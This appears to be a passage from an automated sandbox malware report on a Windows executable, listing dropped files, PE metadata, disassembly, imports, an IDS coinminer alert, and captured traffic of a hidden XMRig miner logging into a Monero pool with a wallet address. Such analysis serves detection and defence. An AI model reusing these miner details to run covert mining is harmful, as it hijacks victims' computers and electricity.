                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\ProgramData\win32\svhost.exe
                                                          File Type:PE32+ executable (native) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):14544
                                                          Entropy (8bit):6.2660301556221185
                                                          Encrypted:false
                                                          SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                          MD5:0C0195C48B6B8582FA6F6373032118DA
                                                          SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                          SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                          SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 5%
                                                          Joe Sandbox View:
                                                          • Filename: T52Z708x2p.exe, Detection: malicious, Browse
                                                          • Filename: lJ4EzPSKMj.exe, Detection: malicious, Browse
                                                          • Filename: Us051y7j25.exe, Detection: malicious, Browse
                                                          • Filename: bypass.exe, Detection: malicious, Browse
                                                          • Filename: MDE_File_Sample_7046d0b264f80a016ec10158377c7e76c395cffb.zip, Detection: malicious, Browse
                                                          • Filename: Q3Vq6yp33F.exe, Detection: malicious, Browse
                                                          • Filename: 2JkHiPgkLE.exe, Detection: malicious, Browse
                                                          • Filename: file.exe, Detection: malicious, Browse
                                                          • Filename: loader.exe, Detection: malicious, Browse
                                                          • Filename: SecuriteInfo.com.Win64.Evo-gen.31489.1077.exe, Detection: malicious, Browse
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................
                                                          File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                          Entropy (8bit):6.53722623620131
                                                          TrID:
                                                          • Win64 Executable GUI (202006/5) 92.65%
                                                          • Win64 Executable (generic) (12005/4) 5.51%
                                                          • Generic Win/DOS Executable (2004/3) 0.92%
                                                          • DOS Executable Generic (2002/1) 0.92%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:prog.exe
                                                          File size:2'663'424 bytes
                                                          MD5:d3adc3ec7b76556b7fac591c33f31ea9
                                                          SHA1:b7295fae70f550aa2963da196b08636094e26e93
                                                          SHA256:25231ba6616c0c1bbc4dda82bdd46ad067577e16971bae412b1192b250b456dc
                                                          SHA512:0edd9263191b82e525da655f76597bbd755174e8436e1e3a783a6a7f7064077e651a7d4dd36b3fd1b353bc435ff9d3ade466d43327ba086dee89b712cab73985
                                                          SSDEEP:49152:BMnw0O8lulPUtBbXmsGHePO2/cqKQBxLEHq86RM+uFVwYm6fYfOuFa1Y+PJq++W5:CnfxYW/b8em2/ctQBxGql2+Szm6fYfOo
                                                          TLSH:F3C533E427112BF5F4A14473B1EC8E7D29463CD01B8D90CBBBAD60993095BE52279B8F
                                                          File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......f.........."...........(.....@..........@............................. )...........`........................................
                                                          Icon Hash:00928e8e8686b000
                                                          Entrypoint:0x140001140
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x140000000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x66F8AA8A [Sun Sep 29 01:16:58 2024 UTC]
                                                          TLS Callbacks:0x40001760, 0x1, 0x400017e0, 0x1
                                                          CLR (.Net) Version:
                                                          OS Version Major:6
                                                          OS Version Minor:0
                                                          File Version Major:6
                                                          File Version Minor:0
                                                          Subsystem Version Major:6
                                                          Subsystem Version Minor:0
                                                          Import Hash:3d303175fced9345f14b8a51817a6c63
                                                          Instruction
                                                          dec eax
                                                          sub esp, 28h
                                                          dec eax
                                                          mov eax, dword ptr [00009ED5h]
                                                          mov dword ptr [eax], 00000001h
                                                          call 00007FBBA081C74Fh
                                                          nop
                                                          nop
                                                          nop
                                                          dec eax
                                                          add esp, 28h
                                                          ret
                                                          nop
                                                          inc ecx
                                                          push edi
                                                          inc ecx
                                                          push esi
                                                          push esi
                                                          push edi
                                                          push ebx
                                                          dec eax
                                                          sub esp, 20h
                                                          dec eax
                                                          mov eax, dword ptr [00000030h]
                                                          dec eax
                                                          mov edi, dword ptr [eax+08h]
                                                          dec eax
                                                          mov esi, dword ptr [00009EC9h]
                                                          xor eax, eax
                                                          dec eax
                                                          cmpxchg dword ptr [esi], edi
                                                          sete bl
                                                          je 00007FBBA081C770h
                                                          dec eax
                                                          cmp edi, eax
                                                          je 00007FBBA081C76Bh
                                                          dec esp
                                                          mov esi, dword ptr [0000C591h]
                                                          nop word ptr [eax+eax+00000000h]
                                                          mov ecx, 000003E8h
                                                          inc ecx
                                                          call esi
                                                          xor eax, eax
                                                          dec eax
                                                          cmpxchg dword ptr [esi], edi
                                                          sete bl
                                                          je 00007FBBA081C747h
                                                          dec eax
                                                          cmp edi, eax
                                                          jne 00007FBBA081C729h
                                                          dec eax
                                                          mov edi, dword ptr [00009E90h]
                                                          mov eax, dword ptr [edi]
                                                          cmp eax, 01h
                                                          jne 00007FBBA081C74Eh
                                                          mov ecx, 0000001Fh
                                                          call 00007FBBA0825944h
                                                          jmp 00007FBBA081C769h
                                                          cmp dword ptr [edi], 00000000h
                                                          je 00007FBBA081C74Bh
                                                          mov byte ptr [00289FC9h], 00000001h
                                                          jmp 00007FBBA081C75Bh
                                                          mov dword ptr [edi], 00000001h
                                                          dec eax
                                                          mov ecx, dword ptr [00009E7Ah]
                                                          dec eax
                                                          mov edx, dword ptr [00009E7Bh]
                                                          call 00007FBBA082593Bh
                                                          mov eax, dword ptr [edi]
                                                          cmp eax, 01h
                                                          jne 00007FBBA081C75Bh
                                                          dec eax
                                                          mov ecx, dword ptr [00009E50h]
                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xd4300x3c.rdata
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x2900000x350.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x28d0000x18c.pdata
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x2910000x78.reloc
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0xb0a00x28.rdata
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb4100x138.rdata
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0xd5e00x170.rdata
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          .text0x10000x95760x9600e871941b2a1be0bca3ccc51ed102f079False0.4900260416666667data6.1447162762330905IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                          .rdata0xb0000x2bd00x2c0092e5cea85d0a7dbaad62678aaf20867dFalse0.49156605113636365data4.675362756852205IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .data0xe0000x27ef600x27d20095c8c619b5ec2f3c4c232458f13ad446unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .pdata0x28d0000x18c0x20010e57cb431088f4e5a2b3aa4d0b0ba00False0.51171875data3.205149816774182IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .00cfg0x28e0000x100x200b18c7380298e104adf73576fa46bccc1False0.04296875data0.15127132530476972IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .tls0x28f0000x100x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .rsrc0x2900000x3500x400afe7e6c6372646407803bf7f6015520dFalse0.3642578125data2.815670913075077IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .reloc0x2910000x780x200d66471f02600051747db3badfb69bc4aFalse0.228515625data1.4089317484997983IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                          RT_VERSION0x2900600x2f0SysEx File - IDPEnglishUnited States0.449468085106383
                                                          DLLImport
                                                          msvcrt.dll__C_specific_handler, __getmainargs, __initenv, __iob_func, __set_app_type, __setusermatherr, _amsg_exit, _cexit, _commode, _fmode, _initterm, _onexit, _time64, _wcsicmp, _wcsnicmp, abort, calloc, exit, fprintf, free, fwrite, malloc, memcpy, memset, rand, signal, srand, strlen, strncmp, vfprintf, wcscat, wcscpy, wcslen, wcsncmp
                                                          KERNEL32.dllDeleteCriticalSection, EnterCriticalSection, GetLastError, InitializeCriticalSection, LeaveCriticalSection, SetUnhandledExceptionFilter, Sleep, TlsGetValue, VirtualProtect, VirtualQuery
                                                          Language of compilation systemCountry where language is spokenMap
                                                          EnglishUnited States
                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                          2024-10-26T16:36:14.260707+02002036289ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro)2192.168.2.5587501.1.1.153UDP
                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Oct 26, 2024 16:36:14.277605057 CEST49781443192.168.2.595.179.241.203
                                                          Oct 26, 2024 16:36:14.277707100 CEST4434978195.179.241.203192.168.2.5
                                                          Oct 26, 2024 16:36:14.277810097 CEST49781443192.168.2.595.179.241.203
                                                          Oct 26, 2024 16:36:14.278083086 CEST49781443192.168.2.595.179.241.203
                                                          Oct 26, 2024 16:36:14.278117895 CEST4434978195.179.241.203192.168.2.5
                                                          Oct 26, 2024 16:36:16.170316935 CEST4434978195.179.241.203192.168.2.5
                                                          Oct 26, 2024 16:36:16.174884081 CEST49781443192.168.2.595.179.241.203
                                                          Oct 26, 2024 16:36:16.174945116 CEST4434978195.179.241.203192.168.2.5
                                                          Oct 26, 2024 16:36:16.176630974 CEST4434978195.179.241.203192.168.2.5
                                                          Oct 26, 2024 16:36:16.176728964 CEST49781443192.168.2.595.179.241.203
                                                          Oct 26, 2024 16:36:16.177922964 CEST49781443192.168.2.595.179.241.203
                                                          Oct 26, 2024 16:36:16.178030968 CEST4434978195.179.241.203192.168.2.5
                                                          Oct 26, 2024 16:36:16.231553078 CEST49781443192.168.2.595.179.241.203
                                                          Oct 26, 2024 16:36:16.231614113 CEST4434978195.179.241.203192.168.2.5
                                                          Oct 26, 2024 16:36:16.278244019 CEST49781443192.168.2.595.179.241.203
                                                          Oct 26, 2024 16:36:16.428292036 CEST4434978195.179.241.203192.168.2.5
                                                          Oct 26, 2024 16:36:16.481365919 CEST49781443192.168.2.595.179.241.203
                                                          Oct 26, 2024 16:36:27.602922916 CEST4434978195.179.241.203192.168.2.5
                                                          Oct 26, 2024 16:36:27.653333902 CEST49781443192.168.2.595.179.241.203
                                                          Oct 26, 2024 16:36:49.658514023 CEST4434978195.179.241.203192.168.2.5
                                                          Oct 26, 2024 16:36:49.700248003 CEST49781443192.168.2.595.179.241.203
                                                          Oct 26, 2024 16:37:01.134270906 CEST4434978195.179.241.203192.168.2.5
                                                          Oct 26, 2024 16:37:01.184535027 CEST49781443192.168.2.595.179.241.203
                                                          Oct 26, 2024 16:37:11.453881979 CEST4434978195.179.241.203192.168.2.5
                                                          Oct 26, 2024 16:37:11.497157097 CEST49781443192.168.2.595.179.241.203
                                                          Oct 26, 2024 16:37:33.447185993 CEST4434978195.179.241.203192.168.2.5
                                                          Oct 26, 2024 16:37:33.497075081 CEST49781443192.168.2.595.179.241.203
                                                          Oct 26, 2024 16:37:55.650424957 CEST4434978195.179.241.203192.168.2.5
                                                          Oct 26, 2024 16:37:55.700208902 CEST49781443192.168.2.595.179.241.203
                                                          Oct 26, 2024 16:38:01.129565001 CEST4434978195.179.241.203192.168.2.5
                                                          Oct 26, 2024 16:38:01.184591055 CEST49781443192.168.2.595.179.241.203
                                                          Oct 26, 2024 16:38:06.923521996 CEST49781443192.168.2.595.179.241.203
                                                          Oct 26, 2024 16:38:06.971364975 CEST4434978195.179.241.203192.168.2.5
                                                          Oct 26, 2024 16:38:07.384527922 CEST4434978195.179.241.203192.168.2.5
                                                          Oct 26, 2024 16:38:07.434592009 CEST49781443192.168.2.595.179.241.203
                                                          Oct 26, 2024 16:38:17.735927105 CEST4434978195.179.241.203192.168.2.5
                                                          Oct 26, 2024 16:38:17.778378010 CEST49781443192.168.2.595.179.241.203
                                                          Oct 26, 2024 16:38:34.042309999 CEST49781443192.168.2.595.179.241.203
                                                          Oct 26, 2024 16:38:34.042387009 CEST4434978195.179.241.203192.168.2.5
                                                          Oct 26, 2024 16:38:34.294243097 CEST4434978195.179.241.203192.168.2.5
                                                          Oct 26, 2024 16:38:34.340894938 CEST49781443192.168.2.595.179.241.203
                                                          Oct 26, 2024 16:38:39.639853001 CEST4434978195.179.241.203192.168.2.5
                                                          Oct 26, 2024 16:38:39.684638977 CEST49781443192.168.2.595.179.241.203
                                                          Oct 26, 2024 16:38:40.390106916 CEST49781443192.168.2.595.179.241.203
                                                          Oct 26, 2024 16:38:40.390192986 CEST4434978195.179.241.203192.168.2.5
                                                          Oct 26, 2024 16:38:40.642549992 CEST4434978195.179.241.203192.168.2.5
                                                          Oct 26, 2024 16:38:40.684633017 CEST49781443192.168.2.595.179.241.203
                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Oct 26, 2024 16:36:14.260706902 CEST5875053192.168.2.51.1.1.1
                                                          Oct 26, 2024 16:36:14.275625944 CEST53587501.1.1.1192.168.2.5
                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Oct 26, 2024 16:36:14.260706902 CEST192.168.2.51.1.1.10x96e3Standard query (0)pool.hashvault.proA (IP address)IN (0x0001)false
                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Oct 26, 2024 16:36:14.275625944 CEST1.1.1.1192.168.2.50x96e3No error (0)pool.hashvault.pro95.179.241.203A (IP address)IN (0x0001)false
                                                          Oct 26, 2024 16:36:14.275625944 CEST1.1.1.1192.168.2.50x96e3No error (0)pool.hashvault.pro45.76.89.70A (IP address)IN (0x0001)false
                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.54978195.179.241.2034434696C:\Windows\System32\svchost.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-10-26 14:36:16 UTC595OUTData Raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6c 6f 67 69 6e 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 6c 6f 67 69 6e 22 3a 22 34 32 50 36 65 54 35 66 54 64 4c 50 4d 4e 33 79 48 6b 4a 58 50 35 46 55 56 56 78 78 39 79 56 46 41 54 72 38 69 66 31 66 48 67 4b 4c 63 4a 4c 39 34 62 47 51 39 78 63 34 32 44 36 4d 70 50 31 73 62 69 32 59 68 39 44 6e 39 62 77 36 62 37 33 39 36 67 72 74 42 52 39 79 54 62 72 6b 74 61 71 22 2c 22 70 61 73 73 22 3a 22 31 32 33 34 22 2c 22 61 67 65 6e 74 22 3a 22 58 4d 52 69 67 2f 36 2e 31 39 2e 33 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 6c 69 62 75 76 2f 31 2e 33 38 2e 30 20 6d 73 76 63 2f 32 30 32 32 22 2c 22 72 69 67 69 64 22 3a
                                                          Data Ascii: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"42P6eT5fTdLPMN3yHkJXP5FUVVxx9yVFATr8if1fHgKLcJL94bGQ9xc42D6MpP1sbi2Yh9Dn9bw6b7396grtBR9yTbrktaq","pass":"1234","agent":"XMRig/6.19.3 (Windows NT 10.0; Win64; x64) libuv/1.38.0 msvc/2022","rigid":
                                                          2024-10-26 14:36:16 UTC732INData Raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 65 72 72 6f 72 22 3a 6e 75 6c 6c 2c 22 72 65 73 75 6c 74 22 3a 7b 22 69 64 22 3a 22 64 65 34 30 62 35 39 38 2d 37 31 66 39 2d 34 66 64 35 2d 38 37 35 66 2d 64 37 33 63 38 30 65 33 35 39 64 64 22 2c 22 6a 6f 62 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 64 35 66 63 66 33 62 38 30 36 30 37 61 66 62 63 35 33 31 35 66 61 61 39 35 38 38 38 34 38 33 35 62 37 65 38 63 62 65 33 33 30 37 61 34 34 64 36 66 62 31 64 34 38 35 32 38 39 34 63 62 31 31 62 63 38 62 31 36 36 37 31 31 30 30 30 30 30 30 30 30 30 31 31 37 62 31 32 33 30 35 30 64 38 36 37 38 65 36 63 66 38 34 37 35 66 61 36 38 36 30 30 38 63 64 66 36 65 66 64 30 63 63 39 39 30 32 30 30 61 33 38 61 62 37 32 63 64 35 39 61 62 32 33 31
                                                          Data Ascii: {"id":1,"jsonrpc":"2.0","error":null,"result":{"id":"de40b598-71f9-4fd5-875f-d73c80e359dd","job":{"blob":"1010d5fcf3b80607afbc5315faa958884835b7e8cbe3307a44d6fb1d4852894cb11bc8b166711000000000117b123050d8678e6cf8475fa686008cdf6efd0cc990200a38ab72cd59ab231
                                                          2024-10-26 14:36:27 UTC471INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 65 62 66 63 66 33 62 38 30 36 30 37 61 66 62 63 35 33 31 35 66 61 61 39 35 38 38 38 34 38 33 35 62 37 65 38 63 62 65 33 33 30 37 61 34 34 64 36 66 62 31 64 34 38 35 32 38 39 34 63 62 31 31 62 63 38 62 31 36 36 37 31 31 30 30 30 30 30 30 30 30 30 63 62 30 31 63 36 30 62 38 65 66 32 61 38 31 39 39 30 35 61 39 37 31 61 38 30 32 61 62 63 31 33 35 38 32 39 36 64 63 37 63 38 35 35 38 33 33 30 36 63 35 33 66 31 62 32 32 62 30 63 35 34 64 66 31 64 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 66 34 65 61 61 62 32 65 2d 37 64 30 34 2d 34 33 32 65 2d 62 61 30 38 2d 62 64 66 32 39 30 35 33 31 36 38 39 22 2c 22 74 61
                                                          Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010ebfcf3b80607afbc5315faa958884835b7e8cbe3307a44d6fb1d4852894cb11bc8b166711000000000cb01c60b8ef2a819905a971a802abc1358296dc7c85583306c53f1b22b0c54df1d","job_id":"f4eaab2e-7d04-432e-ba08-bdf290531689","ta
                                                          2024-10-26 14:36:49 UTC471INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 38 31 66 64 66 33 62 38 30 36 30 37 61 66 62 63 35 33 31 35 66 61 61 39 35 38 38 38 34 38 33 35 62 37 65 38 63 62 65 33 33 30 37 61 34 34 64 36 66 62 31 64 34 38 35 32 38 39 34 63 62 31 31 62 63 38 62 31 36 36 37 31 31 30 30 30 30 30 30 30 30 30 31 30 36 66 35 35 31 37 62 37 65 65 63 33 66 32 34 31 65 61 32 37 64 34 63 39 39 36 33 64 39 34 39 64 61 61 30 62 31 63 61 30 36 32 33 31 33 36 66 65 30 37 39 39 38 37 62 31 34 35 66 31 63 35 32 30 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 33 32 62 33 64 34 30 63 2d 61 65 63 33 2d 34 61 35 64 2d 62 64 39 64 2d 34 30 34 64 36 30 33 39 61 35 64 31 22 2c 22 74 61
                                                          Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"101081fdf3b80607afbc5315faa958884835b7e8cbe3307a44d6fb1d4852894cb11bc8b166711000000000106f5517b7eec3f241ea27d4c9963d949daa0b1ca0623136fe079987b145f1c520","job_id":"32b3d40c-aec3-4a5d-bd9d-404d6039a5d1","ta
                                                          2024-10-26 14:37:01 UTC471INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 38 31 66 64 66 33 62 38 30 36 30 37 61 66 62 63 35 33 31 35 66 61 61 39 35 38 38 38 34 38 33 35 62 37 65 38 63 62 65 33 33 30 37 61 34 34 64 36 66 62 31 64 34 38 35 32 38 39 34 63 62 31 31 62 63 38 62 31 36 36 37 31 31 30 30 30 30 30 30 30 30 30 33 34 31 33 65 61 36 61 38 37 33 39 36 34 33 34 34 63 62 30 33 36 61 38 64 61 66 35 35 35 38 35 36 62 62 33 61 65 63 34 38 62 66 64 32 64 37 39 31 37 32 64 38 33 64 64 63 62 61 61 35 34 31 66 32 30 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 32 64 35 39 62 63 32 39 2d 62 38 36 39 2d 34 65 66 65 2d 38 65 36 37 2d 31 38 33 32 62 33 33 61 64 65 31 38 22 2c 22 74 61
                                                          Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"101081fdf3b80607afbc5315faa958884835b7e8cbe3307a44d6fb1d4852894cb11bc8b1667110000000003413ea6a873964344cb036a8daf555856bb3aec48bfd2d79172d83ddcbaa541f20","job_id":"2d59bc29-b869-4efe-8e67-1832b33ade18","ta
                                                          2024-10-26 14:37:11 UTC471INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 39 37 66 64 66 33 62 38 30 36 30 37 61 66 62 63 35 33 31 35 66 61 61 39 35 38 38 38 34 38 33 35 62 37 65 38 63 62 65 33 33 30 37 61 34 34 64 36 66 62 31 64 34 38 35 32 38 39 34 63 62 31 31 62 63 38 62 31 36 36 37 31 31 30 30 30 30 30 30 30 30 30 33 35 62 34 32 30 33 34 32 63 32 34 39 64 65 39 35 30 30 35 64 65 65 33 65 30 31 62 31 34 32 31 38 34 64 37 62 30 64 36 64 32 65 37 35 61 64 61 35 34 30 38 65 66 39 31 33 34 36 66 61 64 35 62 32 35 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 66 39 62 33 32 66 37 36 2d 64 64 61 31 2d 34 61 38 66 2d 61 38 32 37 2d 34 62 66 36 33 36 39 35 31 30 39 64 22 2c 22 74 61
                                                          Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"101097fdf3b80607afbc5315faa958884835b7e8cbe3307a44d6fb1d4852894cb11bc8b16671100000000035b420342c249de95005dee3e01b142184d7b0d6d2e75ada5408ef91346fad5b25","job_id":"f9b32f76-dda1-4a8f-a827-4bf63695109d","ta
                                                          2024-10-26 14:37:33 UTC471INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 61 64 66 64 66 33 62 38 30 36 30 37 61 66 62 63 35 33 31 35 66 61 61 39 35 38 38 38 34 38 33 35 62 37 65 38 63 62 65 33 33 30 37 61 34 34 64 36 66 62 31 64 34 38 35 32 38 39 34 63 62 31 31 62 63 38 62 31 36 36 37 31 31 30 30 30 30 30 30 30 30 30 39 34 35 31 37 37 31 39 32 66 38 39 62 64 38 66 39 32 34 63 62 32 39 38 37 61 66 36 66 30 62 37 39 31 33 34 38 37 30 33 63 39 30 35 34 64 31 61 36 62 63 64 61 39 36 32 38 31 66 38 31 34 32 62 32 61 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 34 39 38 35 62 34 36 66 2d 61 30 39 30 2d 34 30 61 30 2d 61 39 36 35 2d 62 65 33 35 63 35 62 33 34 63 62 39 22 2c 22 74 61
                                                          Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010adfdf3b80607afbc5315faa958884835b7e8cbe3307a44d6fb1d4852894cb11bc8b166711000000000945177192f89bd8f924cb2987af6f0b791348703c9054d1a6bcda96281f8142b2a","job_id":"4985b46f-a090-40a0-a965-be35c5b34cb9","ta
                                                          2024-10-26 14:37:55 UTC471INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 63 33 66 64 66 33 62 38 30 36 30 37 61 66 62 63 35 33 31 35 66 61 61 39 35 38 38 38 34 38 33 35 62 37 65 38 63 62 65 33 33 30 37 61 34 34 64 36 66 62 31 64 34 38 35 32 38 39 34 63 62 31 31 62 63 38 62 31 36 36 37 31 31 30 30 30 30 30 30 30 30 30 61 63 37 38 66 34 32 35 61 37 66 66 38 30 66 35 32 61 34 61 32 31 36 32 39 39 35 39 62 34 31 38 31 66 32 37 65 34 63 62 30 62 39 34 38 61 61 34 64 32 62 35 66 66 30 38 65 61 61 38 65 30 32 62 33 35 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 65 64 63 37 36 63 38 30 2d 65 31 65 35 2d 34 35 37 37 2d 61 63 39 65 2d 32 30 35 61 62 64 31 62 35 31 31 64 22 2c 22 74 61
                                                          Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010c3fdf3b80607afbc5315faa958884835b7e8cbe3307a44d6fb1d4852894cb11bc8b166711000000000ac78f425a7ff80f52a4a21629959b4181f27e4cb0b948aa4d2b5ff08eaa8e02b35","job_id":"edc76c80-e1e5-4577-ac9e-205abd1b511d","ta
